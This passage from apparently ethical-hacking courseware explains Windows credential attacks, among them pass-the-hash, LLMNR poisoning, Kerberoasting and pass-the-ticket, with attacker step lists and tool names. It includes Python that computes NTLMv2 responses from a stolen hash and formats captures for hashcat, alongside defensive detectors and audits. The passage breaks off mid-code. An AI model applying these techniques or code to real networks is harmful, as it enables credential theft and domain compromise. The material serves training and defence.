Attackers exploit such authentication mechanisms and first compromise the target server to retrieve the hashes from the SAM databases. They then input the acquired hashes directly into the authentication mechanism to authenticate with the user's stolen pre-computed hashes. Thus, in a hash injection/PtH attack, the attackers inject a compromised LanMan (LM) or NTLM hash into a local session and then use the hash to authenticate to the network resources. Any server or service (running on Windows, UNIX, or any other OS) using NTLM or LM authentication is susceptible to this attack. This attack can be launched on any OS, but Windows could be more vulnerable owing to its Single Sign-On (SSO) feature, which keeps the password hash in memory so that users can access all resources with a one-time login.

Different techniques are used to perform a hash injection/PtH attack:
o The attacker tries to obtain admin privileges to capture cached values of the users' password hashes from the local user account database or SAM. However, offline usage of these cached hashes can be restricted by the network admin. Hence, this approach may not always be feasible.
o The attacker dumps the password hashes from the local user account database or SAM to retrieve the password hashes of local users, and gains access to admin accounts to compromise other connected systems.
o The attacker captures LM or NTLM challenge-response messages between the client and server and recovers the password by brute-forcing the response offline.
o The attacker retrieves the credentials of local users, as well as those belonging to the security domain, from the Windows lsass.exe process.

The hacker carries out this attack by implementing the following steps:
1. The hacker compromises one workstation/server using a local/remote exploit.
2. The hacker extracts stored hashes using tools such as pwdump7, Mimikatz, etc. and finds a domain admin account hash.
3. The hacker uses tools such as Mimikatz to place one of the retrieved hashes in his/her local lsass.exe process and then uses the hash to log on to any system (including a domain controller) with the same credentials.
4. The hacker extracts all the hashes from the Active Directory database and can now compromise any account in the domain.
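The NTLM authentication process described earlier in this section and the pass-the-hash attack just described are two views of the same computation, and the following added example (written for this edit, not EC-Council code) runs it for both sides. It implements the NTLMv2 variant as specified in MS-NLMP: NTOWFv2 is HMAC-MD5 of the NT hash over the upper-cased user name and domain, and NTProofStr is HMAC-MD5 of that key over the 8-byte server challenge and the client blob. The NT hash is taken as a given 16-byte value, which is all the domain controller stores and all the client needs, so the same functions serve a legitimate client and an attacker who has dumped the hash. The user name, domain, target information and challenges are constructed for the example; the NT hash used is the well-known hash of "password".

```python
import hashlib
import hmac
import os
import struct
import time


def ntowf_v2(nt_hash: bytes, user: str, domain: str) -> bytes:
    """NTOWFv2 = HMAC-MD5(NT hash, UTF-16LE(UPPER(user) + domain)); needs the hash, not the password."""
    return hmac.new(nt_hash, (user.upper() + domain).encode("utf-16-le"), hashlib.md5).digest()


def ntlmv2_blob(client_challenge: bytes, timestamp: int, target_info: bytes) -> bytes:
    """The 'temp' structure: RespType=1, HiRespType=1, 6 reserved bytes, FILETIME,
    8-byte client challenge, 4 reserved bytes, AV pairs from the server, 4 reserved bytes."""
    return (b"\x01\x01" + b"\x00" * 6 + struct.pack("<Q", timestamp)
            + client_challenge + b"\x00" * 4 + target_info + b"\x00" * 4)


def nt_proof(nt_hash: bytes, user: str, domain: str, server_challenge: bytes, blob: bytes) -> bytes:
    """NTProofStr = HMAC-MD5(NTOWFv2, ServerChallenge || temp)."""
    return hmac.new(ntowf_v2(nt_hash, user, domain), server_challenge + blob, hashlib.md5).digest()


def client_response(nt_hash, user, domain, server_challenge, target_info,
                    client_challenge=None, timestamp=None) -> bytes:
    """Client side: NtChallengeResponse = NTProofStr || temp."""
    client_challenge = client_challenge or os.urandom(8)
    if timestamp is None:                         # Windows FILETIME: 100 ns ticks since 1601
        timestamp = int((time.time() + 11644473600) * 10_000_000)
    blob = ntlmv2_blob(client_challenge, timestamp, target_info)
    return nt_proof(nt_hash, user, domain, server_challenge, blob) + blob


def dc_verify(stored_nt_hash, user, domain, server_challenge, response) -> bool:
    """Domain controller side: recompute NTProofStr from the stored hash and compare."""
    proof, blob = response[:16], response[16:]
    expected = nt_proof(stored_nt_hash, user, domain, server_challenge, blob)
    return hmac.compare_digest(proof, expected)


def hashcat_5600(user, domain, server_challenge, response) -> str:
    """A captured exchange in the user::domain:challenge:proof:blob form that hashcat -m 5600
    and John's netntlmv2 format consume for offline guessing."""
    return f"{user}::{domain}:{server_challenge.hex()}:{response[:16].hex()}:{response[16:].hex()}"


def demo():
    nt = bytes.fromhex("8846f7eaee8fb117ad06bdd830b7586c")    # NT hash of "password"
    challenge = os.urandom(8)                                   # 8-byte server challenge from the DC
    # Constructed AV pairs: MsvAvNbDomainName "CORP", then MsvAvEOL.
    target_info = struct.pack("<HH", 2, 8) + "CORP".encode("utf-16-le") + struct.pack("<HH", 0, 0)
    resp = client_response(nt, "alice", "CORP", challenge, target_info)   # what the client sends
    ok = dc_verify(nt, "alice", "CORP", challenge, resp)                  # DC accepts
    wrong = dc_verify(bytes(16), "alice", "CORP", challenge, resp)        # any other hash fails
    return ok, wrong, hashcat_5600("alice", "CORP", challenge, resp)


if __name__ == "__main__":
    print(demo())   # (True, False, 'alice::CORP:<challenge>:<proof>:<blob>')
```

Nothing in client_response touches a password, which is the whole of pass-the-hash: an attacker who injects the 16-byte NT hash into a logon session (as Mimikatz does) produces responses indistinguishable from the legitimate user's. The hashcat_5600 line is also the format a poisoner such as Responder writes to disk when it captures an NTLMv2 response, and cracking it means running the same two HMAC-MD5 computations once per candidate password.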
LLMNR/NBT-NS Poisoning
LLMNR (Link Local Multicast Name Resolution) and NBT-NS (NetBIOS Name Service) are two main elements of Windows OSs used to perform name resolution for hosts present on the same link. These services are enabled by default in Windows OSs. When the DNS server fails to resolve name queries, the host performs an unauthenticated UDP broadcast asking all the hosts if anyone has the name that it is looking for. As the host trying to connect is following an unauthenticated and broadcast process, it becomes easy for an attacker to passively listen to a network for LLMNR (UDP port 5355) and NBT-NS (UDP port 137) broadcasts and respond to the request pretending to be the target host. After accepting a connection with a host, the attacker can utilize tools such as Responder.py or Metasploit to forward the request to a rogue server (for instance, TCP:137) to perform an authentication process. During the authentication process, the attacker sends an NTLMv2 hash to the rogue server, which was obtained from the host trying to authenticate itself. This hash is stored on a disk and can be cracked using offline hash-cracking tools such as hashcat or John the Ripper. Once cracked, these credentials can be used to log in and gain access to the legitimate host system.
Steps involved in LLMNR/NBT-NS poisoning:
1. The user sends a request to connect to the data-sharing system, \\DataServer, which she mistakenly typed as \\DtaServr.
2. The \\DataServer responds to the user, saying that it does not know the host named \\DtaServr.
3. The user then performs an LLMNR/NBT-NS broadcast to find out if anyone in the network knows the host name \\DtaServr.
4. The attacker replies to the user saying that it is \\DataServer, accepts the user's NTLMv2 hash, and responds to the user with an error.

Figure 6.11: LLMNR/NBT-NS poisoning attack
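The four steps above describe what a poisoner looks like on the wire: one host answering name queries it does not own, including names that do not exist anywhere. The following is an added example (not part of the courseware) of a detection check over constructed sensor log lines; the log format, the asset inventory and the canary name are assumptions for the demo, and a real deployment would feed the same NameResponse records from a packet capture or a network sensor.

```python
"""Flag hosts that answer LLMNR/NBT-NS name queries they have no business answering.

Added example, not part of the original courseware. The log format below is
constructed for this demo; map your own capture or sensor output onto NameResponse.
"""
import re
from collections import defaultdict
from dataclasses import dataclass


@dataclass(frozen=True)
class NameResponse:
    ts: str            # capture timestamp
    proto: str         # "LLMNR" (UDP/5355) or "NBT-NS" (UDP/137)
    queried_name: str  # name the victim broadcast a query for
    responder_ip: str  # source IP of the unicast answer


# Constructed sensor log: one line per answer observed on the segment.
SAMPLE_LOG = """\
2024-05-01T10:00:01Z LLMNR  query=DataServer  answer_from=10.0.0.5
2024-05-01T10:00:07Z LLMNR  query=DtaServr    answer_from=10.0.0.66
2024-05-01T10:00:07Z NBT-NS query=DTASERVR    answer_from=10.0.0.66
2024-05-01T10:00:12Z LLMNR  query=wpad        answer_from=10.0.0.66
2024-05-01T10:00:20Z LLMNR  query=DataServer  answer_from=10.0.0.66
2024-05-01T10:01:00Z LLMNR  query=canary-zz9  answer_from=10.0.0.66
"""

LINE_RE = re.compile(r"^(\S+)\s+(LLMNR|NBT-NS)\s+query=(\S+)\s+answer_from=(\S+)$")


def parse_log(text):
    """Turn the constructed log lines into NameResponse records (unparsable lines are skipped)."""
    out = []
    for line in text.splitlines():
        m = LINE_RE.match(line.strip())
        if m:
            out.append(NameResponse(*m.groups()))
    return out


# Hypothetical asset inventory: every name allowed to resolve on this segment and the
# host that owns it. Names outside the inventory should never receive an answer.
INVENTORY = {"dataserver": "10.0.0.5", "printsrv": "10.0.0.9"}
# Canary names are queried on purpose by a monitoring host; any answer is poisoning.
CANARY_NAMES = {"canary-zz9"}


def find_poisoners(responses, inventory=INVENTORY, max_unknown=1):
    """Return {responder_ip: [reasons]} for hosts that behave like a poisoner."""
    unknown_names = defaultdict(set)
    reasons = defaultdict(list)
    for r in responses:
        name = r.queried_name.lower()
        if name in CANARY_NAMES:
            reasons[r.responder_ip].append(f"answered canary name {name} ({r.proto})")
        elif name in inventory:
            if inventory[name] != r.responder_ip:
                reasons[r.responder_ip].append(
                    f"claimed {name}, owned by {inventory[name]}")
        else:
            unknown_names[r.responder_ip].add(name)
    # A legitimate host answers only for itself; answering many unknown names is the
    # signature of a tool that replies to every query it sees.
    for ip, names in unknown_names.items():
        if len(names) > max_unknown:
            reasons[ip].append(f"answered {len(names)} unknown names: {sorted(names)}")
    return dict(reasons)


if __name__ == "__main__":
    for ip, why in find_poisoners(parse_log(SAMPLE_LOG)).items():
        print(ip, "->", "; ".join(why))
```

The canary check is the cheapest of the three: a monitoring host periodically broadcasts a query for a name that is guaranteed not to exist, so any answer at all identifies the poisoning host, independently of how complete the inventory is.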

LLMNR/NBT-NS Poisoning Tools
• Responder
Source: https://github.com
Responder is an LLMNR, NBT-NS, and MDNS poisoner. It responds to specific NBT-NS (NetBIOS Name Service) queries based on their name suffix. By default, the tool only responds to a File Server Service request, which is for SMB. As shown in the screenshots, attackers use the Responder tool to extract information such as the target system's OS version, client version, NTLM client IP address, NTLM username, and password hash.

Figure 6.12: Screenshot of Responder

Figure 6.13: Screenshot showing the output of Responder NTLM hashes
Internal Monologue Attack
The internal monologue attack is similar to the attack performed using Mimikatz, except that the memory area of the Local Security Authority Subsystem Service (LSASS) process is not dumped, thereby avoiding Windows Credential Guard and antivirus. Mimikatz is a post-exploitation tool, through which attackers can extract plaintext passwords, Kerberos tickets, and NTLM hashes from LSASS process memory. Attackers use Mimikatz to retrieve user credentials from LSASS process memory, and the acquired information helps them in performing lateral movement in the post-exploitation phase.
An internal monologue attack is usually performed in a secure environment where Mimikatz cannot be executed. In this attack, using the Security Support Provider Interface (SSPI) from a user-mode application, a local procedure call to the NTLM authentication package is invoked to calculate the NetNTLM response in the context of the logged-on user.

Steps to perform an internal monologue attack:
1. The attacker disables the security controls of NetNTLMv1 by modifying the values of LMCompatibilityLevel, NTLMMinClientSec, and RestrictSendingNTLMTraffic.
2. The attacker extracts all the non-network logon tokens from all the active processes to masquerade as legitimate users.
3. Now, the attacker interacts with NTLM SSP locally, for each masqueraded user, to obtain a NetNTLMv1 response to the chosen challenge in the security context of that user.
4. Now, the attacker restores NTLMMinClientSec, LMCompatibilityLevel, and RestrictSendingNTLMTraffic to their actual values.
5. The attacker uses rainbow tables to crack the NTLM hash of the captured responses.
6. Finally, the attacker uses the cracked hashes to gain system-level access.
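Steps 1 and 4 are the defender's opportunity: the attack only works while the three NTLM settings are weakened, and it has to put them back afterwards. The following is an added example (not part of the courseware) that audits those values against a hardened baseline and flags any departure from it, however brief. The registry value names, paths and bit flags are the real Windows ones; the snapshots are constructed dicts, and on a live host you would fill them from the registry (for instance with the winreg module) or from registry-change events.

```python
"""Audit the NTLM client settings an internal monologue attack downgrades, and flag
the downgrade itself. Added example, not part of the original courseware; the
snapshot dicts are constructed (read the live values from the registry)."""

# HKLM\SYSTEM\CurrentControlSet\Control\Lsa\LmCompatibilityLevel
#   0-2: client may send LM/NTLMv1 responses   3-4: NTLMv2 only   5: also refuse LM/NTLM
# HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\NtlmMinClientSec  (bit flags below)
# HKLM\SYSTEM\CurrentControlSet\Control\Lsa\MSV1_0\RestrictSendingNTLMTraffic
#   0: allow all   1: audit all   2: deny all
REQUIRE_NTLMV2_SESSION_SECURITY = 0x00080000
REQUIRE_128_BIT_ENCRYPTION = 0x20000000

HARDENED = {
    "LmCompatibilityLevel": 5,
    "NtlmMinClientSec": REQUIRE_NTLMV2_SESSION_SECURITY | REQUIRE_128_BIT_ENCRYPTION,
    "RestrictSendingNTLMTraffic": 2,
}
# Constructed snapshot of what a host looks like between step 1 and step 4.
DURING_ATTACK = {
    "LmCompatibilityLevel": 2,
    "NtlmMinClientSec": 0,
    "RestrictSendingNTLMTraffic": 0,
}


def audit_ntlm_settings(snapshot):
    """Return a list of findings; an empty list means the baseline is met."""
    findings = []
    # Assumption: when the value is absent the OS default (3) applies.
    level = snapshot.get("LmCompatibilityLevel", 3)
    if level < 3:
        findings.append(f"LmCompatibilityLevel={level}: client may send LM/NTLMv1 "
                        "responses (expect 5)")
    elif level < 5:
        findings.append(f"LmCompatibilityLevel={level}: NTLMv2 is sent, but LM/NTLM "
                        "are still accepted (expect 5)")
    sec = snapshot.get("NtlmMinClientSec", 0)
    missing = [name for name, bit in (
        ("NTLMv2 session security", REQUIRE_NTLMV2_SESSION_SECURITY),
        ("128-bit encryption", REQUIRE_128_BIT_ENCRYPTION)) if not sec & bit]
    if missing:
        findings.append(f"NtlmMinClientSec=0x{sec:08x}: does not require "
                        + ", ".join(missing))
    if snapshot.get("RestrictSendingNTLMTraffic", 0) == 0:
        findings.append("RestrictSendingNTLMTraffic=0: outgoing NTLM is neither "
                        "audited nor blocked")
    return findings


def detect_downgrade(baseline, current):
    """Names of values that moved away from the baseline. Because the attack restores
    them in step 4, compare every registry-change event, not only periodic scans."""
    return sorted(k for k in baseline if current.get(k) != baseline[k])


if __name__ == "__main__":
    print("hardened:", audit_ntlm_settings(HARDENED))
    print("during attack:", audit_ntlm_settings(DURING_ATTACK))
    print("changed values:", detect_downgrade(HARDENED, DURING_ATTACK))
```

A point-in-time audit run after step 4 sees nothing wrong, which is why detect_downgrade is meant to run on each registry value-set event for these keys rather than on a schedule.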

Figure 6.14: Depiction of internal monologue attack

Cracking Kerberos Password
Kerberos is the most commonly used authentication protocol for network entities. Due to its widespread acceptance, it is susceptible to various attacks. Attackers have developed various ways to hack into Kerberos and exploit its vulnerabilities to crack weak passwords, inject malicious codes, and obtain information about the network infrastructure and various network entities. Attackers target the Kerberos authentication protocol in two common ways: namely, cracking the TGS, known as Kerberoasting, and cracking the TGT, known as AS-REP Roasting.
• AS-REP Roasting (Cracking TGT)
In this attack, attackers request an authentication ticket (TGT) from the KDC in the form of an AS-REQ packet. If the user account exists, the KDC replies with a TGT encrypted with the account's credentials. This allows attackers to receive an encrypted ticket, which can then be saved offline and further cracked to obtain the password. Attackers can perform this type of attack both actively and passively. In an active scenario, attackers generate an AS-REP message for the user, whereas in a passive scenario, attackers observe an AS-REP message.
In Kerberos authentication, the pre-authentication mode is enabled by default and is designed to prevent offline password-guessing attacks. Therefore, to perform an AS-REP Roasting attack, attackers must identify user accounts with pre-authentication mode disabled, i.e., the user account must be set to "Do not require Kerberos preauthentication." Attackers use tools such as Rubeus to perform AS-REP roasting attacks.

The following steps are involved in AS-REP Roasting:
1. The attacker identifies a user account with the pre-authentication option disabled.
2. On behalf of the user, the attacker requests an authentication ticket (TGT) from the domain controller or KDC.
3. The domain controller verifies the user account and replies with a TGT encrypted with the account's credentials.
4. The attacker stores the TGT offline, and cracks it to extract the user account password and further access the network entity (here, the application server).

Figure 6.15: AS-REP Roasting
• Kerberoasting (Cracking TGS)
In this attack, attackers request a TGS for the service principal name (SPN) of the target service account. This request is made to the domain controller by using a valid domain user's authentication ticket (TGT). The domain controller does not keep any record of whether the user has accessed the network resources; it just searches for the SPN in the Active Directory, and further replies with a ticket encrypted using the service account linked with the SPN. The type of encryption used for the requested service ticket (ST) is RC4_HMAC_MD5, which indicates that the NTLM password hash is used for encrypting the ST. To crack the ST, attackers export the TGS tickets from memory and save them offline to the local system. Furthermore, attackers use different NTLM hashes to crack the ST and, on successfully cracking it, the service account password can be discovered. Attackers use tools such as Kerberoast to perform Kerberoasting attacks on Kerberos authentication.

The following steps are involved in Kerberoasting:
1. On behalf of a user, the attacker requests an authentication ticket (TGT) from the domain controller or KDC.
2. The domain controller verifies the user account and replies with an encrypted TGT.
3. With a valid user authentication ticket (TGT), the attacker requests the TGS.
4. The domain controller verifies the TGT and replies with a TGS ticket.
5. The attacker stores the TGS ticket offline, and cracks it to extract the service account password and further access the network entity (here, the application server).

Figure 6.16: Kerberoasting
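Both attacks above depend on account configuration that a defender can enumerate: AS-REP Roasting needs "Do not require Kerberos preauthentication" set, and Kerberoasting needs a user account carrying an SPN whose tickets are keyed from the NTLM hash (RC4_HMAC_MD5). The following is an added example (not part of the courseware) that triages an export of Active Directory user attributes for both conditions. The userAccountControl and msDS-SupportedEncryptionTypes bit values are the real ones; the account records are constructed, and a real run would pull the same fields with Get-ADUser or an LDAP query.

```python
"""Find accounts exposed to AS-REP roasting or Kerberoasting from exported AD user
attributes. Added example, not part of the original courseware; the account records
below are constructed (pull the same fields from AD with ldap3 or Get-ADUser)."""
from dataclasses import dataclass, field

# userAccountControl bits
UF_ACCOUNTDISABLE = 0x2
UF_NORMAL_ACCOUNT = 0x200
UF_WORKSTATION_TRUST_ACCOUNT = 0x1000
UF_DONT_REQUIRE_PREAUTH = 0x400000   # "Do not require Kerberos preauthentication"
# msDS-SupportedEncryptionTypes bits
ETYPE_RC4_HMAC = 0x4
ETYPE_AES128 = 0x8
ETYPE_AES256 = 0x10


@dataclass
class Account:
    sam: str
    uac: int
    spns: list = field(default_factory=list)  # servicePrincipalName values
    etypes: int = 0       # msDS-SupportedEncryptionTypes; 0/absent treated as RC4-capable
    pwd_age_days: int = 0


def assess(acct):
    """Return the list of exposures for one account (empty list = nothing to report)."""
    findings = []
    if acct.uac & UF_ACCOUNTDISABLE:
        return findings  # disabled accounts get no TGT or TGS at all
    if acct.uac & UF_DONT_REQUIRE_PREAUTH:
        findings.append("AS-REP roastable: pre-authentication disabled")
    # Computer accounts (sAMAccountName ending in $) have long random passwords;
    # the Kerberoasting target is a *user* account that carries an SPN.
    if acct.spns and not acct.sam.endswith("$"):
        aes_only = (acct.etypes & (ETYPE_AES128 | ETYPE_AES256)
                    and not acct.etypes & ETYPE_RC4_HMAC)
        if aes_only:
            findings.append("Kerberoastable: user SPN, but tickets are AES-only "
                            "(far slower to crack)")
        else:
            findings.append("Kerberoastable: user SPN with RC4_HMAC_MD5 tickets "
                            "(NTLM hash is the ticket key)")
        if acct.pwd_age_days > 365:
            findings.append(f"service password unchanged for {acct.pwd_age_days} days")
    return findings


def triage(accounts):
    """Map sAMAccountName -> findings for every account that has at least one."""
    return {a.sam: f for a in accounts if (f := assess(a))}


# Constructed sample export.
SAMPLE = [
    Account("jdoe", UF_NORMAL_ACCOUNT),
    Account("legacyapp", UF_NORMAL_ACCOUNT | UF_DONT_REQUIRE_PREAUTH),
    Account("svc_sql", UF_NORMAL_ACCOUNT, spns=["MSSQLSvc/db01.corp.example:1433"],
            etypes=0, pwd_age_days=900),
    Account("svc_web", UF_NORMAL_ACCOUNT, spns=["HTTP/web01.corp.example"],
            etypes=ETYPE_AES256, pwd_age_days=30),
    Account("DB01$", UF_WORKSTATION_TRUST_ACCOUNT, spns=["HOST/db01.corp.example"]),
    Account("oldsvc", UF_NORMAL_ACCOUNT | UF_ACCOUNTDISABLE | UF_DONT_REQUIRE_PREAUTH,
            spns=["cifs/old.corp.example"]),
]

if __name__ == "__main__":
    for sam, findings in triage(SAMPLE).items():
        print(sam, "->", "; ".join(findings))
```

The remediation follows directly from each finding: re-enable pre-authentication, move service accounts to AES-only encryption types (or to group managed service accounts, which rotate their own passwords), and rotate any long-lived service password.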
Pass-the-Ticket Attack
Pass-the-ticket is a technique used for authenticating a user to a system that is using Kerberos tickets without providing the user's password. Kerberos authentication allows users to access services provided by remote servers without the need to provide passwords for every requested service. To perform this attack, the attacker dumps Kerberos tickets of legitimate accounts using credential dumping tools.
A TGT or ST can be captured based on the level of access permitted to a client. Here, the ST permits access to specific resources, and the TGT is used to send a request to the TGS for the ST to access all the services the client has been authorized to access.
Silver Tickets are captured for resources that use Kerberos for the authentication process, and can be used to create tickets to call a specific service and access the system that offers the service.
Golden tickets are captured for the domain with the KDC KRBTGT NTLM hash, which allows the creation of TGTs for any profile in the Active Directory.

Attackers launch pass-the-ticket attacks either by stealing the ST/TGT from an end-user machine and using it to disguise themselves as a valid user, or by stealing the ST/TGT from a compromised AS. After obtaining one of these tickets, an attacker can gain unauthorized access to the network services and search for additional permissions and critical data.
Attackers use tools such as Mimikatz, Rubeus, Windows Credentials Editor, etc. to launch pass-the-ticket attacks:
• Mimikatz
Source: https://github.com
Mimikatz allows attackers to pass a Kerberos TGT to other computers and sign in using the victim's ticket. The tool also helps in extracting plaintext passwords, hashes, PIN codes, and Kerberos tickets from memory. It is an open-source tool that enables anyone to see and store authentication data such as Kerberos tickets. Attackers can leverage this for privilege escalation and credential stealing.

Figure 6.17: Screenshot of Mimikatz

Other Active Online Attacks

Combinator Attack
In a combinator attack, attackers combine the entries of the first dictionary with those of the second dictionary. The resultant list of entries can be used to produce full names and compound words. Attackers use this wordlist to crack a password on the target system and gain unauthorized access to the system files.
Steps involved in a combinator attack:
• Find a valid target user.
• Build your own two dictionaries or download two different wordlist dictionaries from online sources.
• Create a final wordlist by merging the entries of the two separate dictionaries. For example, if the first dictionary contains 100 words, and the second dictionary contains 70 words, then the merged dictionary contains 100 x 70 = 7000 words.
• Use automated tools, such as hashcat, to crack the password of the target user.
Attackers perform this type of password cracking in a situation where a random phrase of words is used as a default password generation procedure.
Fingerprint Attack
In a fingerprint attack, the passphrase is broken down into fingerprints consisting of single- and multi-character combinations that a target user might choose as his/her password. For example, for the word "password", this technique would create fingerprints "p", "a", "s", "s", "w", "o", "r", "d", "pa", "ss", "wo", "rd", etc. Attackers usually perform this attack to crack complex passwords such as "pass-10".
To perform this attack, attackers create a list of unique password hashes from a leaked password hash database, and then perform a brute-force attack to obtain a wordlist and further start the fingerprint attack.
PRINCE Attack
A PRobability INfinite Chained Elements (PRINCE) attack is an advanced version of a combinator attack in which, instead of taking inputs from two different dictionaries, attackers use a single input dictionary to build chains of combined words. This chain can have between 1 and n words from the input dictionary concatenated together to form a chain of words. For example, if the length of characters to be guessed is 5, then the following combinations are created from the input dictionary:
5-letter word
3-letter word + 2-letter word
2-letter word + 3-letter word
1-letter word + 4-letter word
etc.
Toggle-Case Attack
In a toggle-case attack, attackers try all possible upper-case and lower-case combinations of a word present in the input dictionary. For example, if a word in the input dictionary is "xyz", the following set of combinations is generated:
xyz
Xyz
xYz
xyZ
XYz
etc.
The success rate of this attack is low for the following reasons:
• If users use upper-case letters, they either use them in the first place or in between the word.
• In other cases, the users use a lower or equal number of upper-case letters than lower-case letters.
Markov-Chain Attack
In Markov-chain attacks, attackers gather a password database and split each password entry into two- and three-character syllables (2-grams and 3-grams); using these character elements, a new alphabet is developed, which is then matched with the existing password database.
In the initial phase of this attack, attackers set a threshold parameter for the occurrences of the elements, and only the letters present in the new alphabet that occurred at least the minimum number of times are selected. Furthermore, this technique combines the selected letters into words with a maximum length of eight characters, and then a dictionary attack is performed to crack the target password.
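The combinator, PRINCE and toggle-case attacks above all succeed against passwords that are concatenations of dictionary words with cosmetic variation, and the defense side of that is password screening at the moment a password is chosen (one of the countermeasures listed later in this module). The following is an added example (not part of the courseware) of such a screen: it lowercases the candidate (which collapses every toggle-case variant), undoes common letter substitutions, and then asks whether what remains is a chain of up to n dictionary words, which is exactly the space a combinator or PRINCE wordlist enumerates. The dictionary, leaked-password list and substitution table are constructed stand-ins; a real deployment would use a full wordlist and a breach corpus.

```python
"""Password screening against combinator/PRINCE/toggle-case style guesses.
Added example, not part of the original courseware; DICTIONARY, LEAKED and the
substitution table are constructed stand-ins for real wordlists."""
import re
from functools import lru_cache

DICTIONARY = {"pass", "word", "sun", "shine", "blue", "sky", "dragon", "admin", "summer"}
LEAKED = {"pass-10", "password1", "qwerty"}        # constructed breach list
MAX_CHAIN = 4                                      # PRINCE-style chains of up to n words
MIN_LENGTH = 12
# Assumed substitution table: characters users swap in to "strengthen" a word.
LEET = str.maketrans("@$!01345", "asioleas")


def chain_split(word, dictionary=DICTIONARY, max_words=MAX_CHAIN):
    """Return the dictionary words whose concatenation is `word`, or None.
    This is the reverse of what a combinator/PRINCE attack enumerates."""
    if not word:
        return None

    @lru_cache(maxsize=None)
    def solve(i, left):
        if i == len(word):
            return ()
        if left == 0:
            return None
        for j in range(i + 1, len(word) + 1):
            if word[i:j] in dictionary:
                rest = solve(j, left - 1)
                if rest is not None:
                    return (word[i:j],) + rest
        return None

    parts = solve(0, max_words)
    return list(parts) if parts else None


def normalize(pw):
    """Two views of the candidate: letters only, and letters after undoing leet."""
    low = pw.lower()                                # toggle-case variants collapse here
    plain = re.sub(r"[^a-z]", "", low)
    leet = re.sub(r"[^a-z]", "", low.translate(LEET))
    return {plain, leet}


def screen(pw):
    """Return (accepted, reason)."""
    if pw.lower() in LEAKED:
        return False, "appears in a leaked-password list"
    for core in normalize(pw):
        if core in DICTIONARY:
            return False, f"dictionary word '{core}' with case/symbol/digit decoration"
        chain = chain_split(core)
        if chain:
            return False, f"chain of dictionary words {chain} (combinator/PRINCE-style guess)"
    if len(pw) < MIN_LENGTH:
        return False, f"shorter than {MIN_LENGTH} characters"
    return True, "ok"


if __name__ == "__main__":
    for cand in ["PassWord", "BlueSkyDragon!", "Summer2024!", "P@ssw0rd", "pass-10",
                 "correct horse battery staple"]:
        print(f"{cand!r}: {screen(cand)}")
```

The screen does not model the fingerprint attack (arbitrary substrings of leaked passwords), which is why the leaked-list check and the length floor remain necessary alongside the chain test; the chain test alone would accept a long password built from a single leaked fragment.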

Passive Online Attacks: Wire Sniffing
• Attackers run packet sniffer tools on the local area network (LAN) to access and record the raw network traffic
• The captured data may include sensitive information such as passwords (FTP, login sessions, etc.) and emails
• Sniffed credentials are used to gain unauthorized access to the target system
Wire Sniffing: computationally complex; hard to perpetrate

Passive Online Attacks: Man-in-the-Middle and Replay Attacks
• In an MITM attack, the attacker acquires access to the communication channels between the victim and the server to extract the information needed
• In a replay attack, packets and authentication tokens are captured using a sniffer. After the relevant information is extracted, the tokens are placed back on the network to gain access
Considerations: relatively hard to perpetrate; must be trusted by one or both sides; can sometimes be broken by invalidating the traffic

Passive Online Attacks

Wire Sniffing
Packet sniffing is a form of wire sniffing or wiretapping in which hackers sniff credentials during transit by capturing Internet packets. Attackers rarely use sniffers to perform this type of attack. With packet sniffing, an attacker can gain passwords to applications such as email, websites, SMB, FTP, rlogin sessions, or SQL. As sniffers run in the background, the victim remains unaware of the sniffing.


As sniffers gather packets at the data link layer, they can grab all the packets on the LAN of the machine running the sniffer program. This method is relatively hard to perpetrate and computationally complicated. This is because a network with a hub implements a broadcast medium that all systems share on the LAN. The LAN sends the data to all machines connected to it. If an attacker runs a sniffer on one system on the LAN, he/she can gather data sent to and from any other system on the LAN. The majority of sniffer tools are ideally suited to sniff data in a hub environment. These tools are passive sniffers, as they passively wait for data transfer before capturing the information. They are efficient at imperceptibly gathering data from the LAN. The captured data may include passwords sent to remote systems during FTP, rlogin sessions, and electronic mail. The attacker uses these sniffed credentials to gain unauthorized access to the target system. There are a variety of tools available on the Internet for passive wire sniffing.
Man-in-the-Middle and Replay Attacks
When two parties are communicating, a man-in-the-middle (MITM) attack can take place, in which a third party intercepts a communication between the two parties without their knowledge. The third party eavesdrops on the traffic and then passes it along. To do this, the "man in the middle" has to sniff from both sides of the connection simultaneously. In an MITM attack, the attacker acquires access to the communication channels between the victim and server to extract the information. This type of attack is often used in telnet and wireless technologies. It is not easy to implement such attacks owing to the TCP sequence numbers and the speed of the communication. This method is relatively hard to perpetrate and can sometimes be broken by invalidating the traffic.
In a replay attack, packets and authentication tokens are captured using a sniffer. After the relevant info is extracted, the tokens are placed back on the network to gain access. The attacker uses this type of attack to replay bank transactions or similar types of data transfer, in the hope of replicating and/or altering activities, such as banking deposits or transfers.

Figure 6.19: Man-in-the-middle and replay attacks
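A replay attack works only if a captured token is still accepted when it is put back on the network. The following is an added example (not part of the courseware) of the standard countermeasure on the verifier's side: every token carries a random nonce and an expiry time under an HMAC, and the verifier rejects anything with a bad signature, anything past its expiry, and any nonce it has already accepted. The key, time-to-live and token layout are constructed for the demo; a real service would hold the key in a secrets store and share the seen-nonce set across its instances.

```python
"""Replay-resistant authentication tokens: nonce + expiry under an HMAC, with the
verifier remembering accepted nonces. Added example, not part of the original
courseware; key, TTL and token format are constructed."""
import base64
import hashlib
import hmac
import secrets
import time

KEY = b"constructed-demo-key"   # in practice: per-service secret from a secrets store
TTL = 30                        # seconds a token stays valid


def issue(user, key=KEY, now=None):
    """Create a token 'base64(user|expiry|nonce).base64(hmac)'."""
    now = int(time.time()) if now is None else now
    payload = f"{user}|{now + TTL}|{secrets.token_hex(8)}".encode()
    tag = hmac.new(key, payload, hashlib.sha256).digest()
    return (base64.urlsafe_b64encode(payload).decode() + "."
            + base64.urlsafe_b64encode(tag).decode())


def forge_tag(token):
    """Keep the payload, zero the tag: models an attacker editing a captured token."""
    p64, _ = token.split(".")
    return p64 + "." + base64.urlsafe_b64encode(bytes(32)).decode()


class Verifier:
    def __init__(self, key=KEY):
        self.key = key
        self.seen = {}  # nonce -> expiry; pruned so memory is bounded by TTL

    def check(self, token, now=None):
        """Return (accepted, user_or_reason)."""
        now = int(time.time()) if now is None else now
        try:
            p64, t64 = token.split(".")
            payload = base64.urlsafe_b64decode(p64)
            tag = base64.urlsafe_b64decode(t64)
            user, exp, nonce = payload.decode().split("|")
            exp = int(exp)
        except (ValueError, UnicodeDecodeError):
            return False, "malformed"
        expected = hmac.new(self.key, payload, hashlib.sha256).digest()
        if not hmac.compare_digest(tag, expected):   # constant-time comparison
            return False, "bad signature"
        if exp < now:
            return False, "expired"
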